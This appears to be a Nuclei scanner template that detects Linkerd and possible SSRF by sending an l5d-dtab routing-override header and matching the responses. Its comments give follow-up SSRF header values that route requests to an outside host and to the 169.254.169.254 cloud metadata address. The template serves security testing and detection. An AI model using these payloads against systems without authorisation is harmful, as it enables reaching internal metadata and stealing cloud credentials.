nuclei-templates/technologies/linkerd-ssrf-detect.yaml

67 lines
1.7 KiB
YAML
Raw Normal View History

2020-06-22 21:25:52 +00:00
id: linkerd-ssrf-detect
# Detect the Linkerd service by overriding the delegation table and
# inspect the response for:
# - a "Via: .. linkerd .."
# - a "l5d-err" and/or a "l5d-success" header
# - a verbose timeout error (binding timeout)
# - a full response
# The full-response case indicates a possible SSRF condition, the others
# only indicates the service presence.
#
# If a full-response is returned you should really manually probe requests with
# the following header values:
#
# - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts
# - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata
info:
name: Linkerd SSRF detection
author: dudez
2020-08-03 21:52:00 +00:00
severity: info
2020-06-22 21:25:52 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/"
headers:
l5d-dtab: /svc/* => /$/inet/example.com/443
matchers-condition: or
matchers:
- type: regex
name: via-linkerd-present
regex:
- '(?mi)^Via\s*?:.*?linkerd.*$'
part: header
- type: regex
name: l5d-err-present
regex:
2020-06-22 21:41:24 +00:00
- '(?mi)^l5d-err:.*$'
2020-06-22 21:25:52 +00:00
part: header
- type: regex
name: l5d-success-class-present
regex:
2020-06-22 21:41:24 +00:00
- '(?mi)^l5d-success-class: 0.*$'
2020-06-22 21:25:52 +00:00
part: header
- type: word
name: ssrf-response-body
words:
- '<p>This domain is for use in illustrative examples in documents.'
part: body
- type: regex
name: resolve-timeout-error-present
regex:
- '(?mi)Exceeded .*? binding timeout while resolving name'
part: body
- type: regex
name: dynbind-error-present
regex:
- '(?mi)exceeded .*? to unspecified while dyn binding'
2020-06-22 21:31:30 +00:00
part: body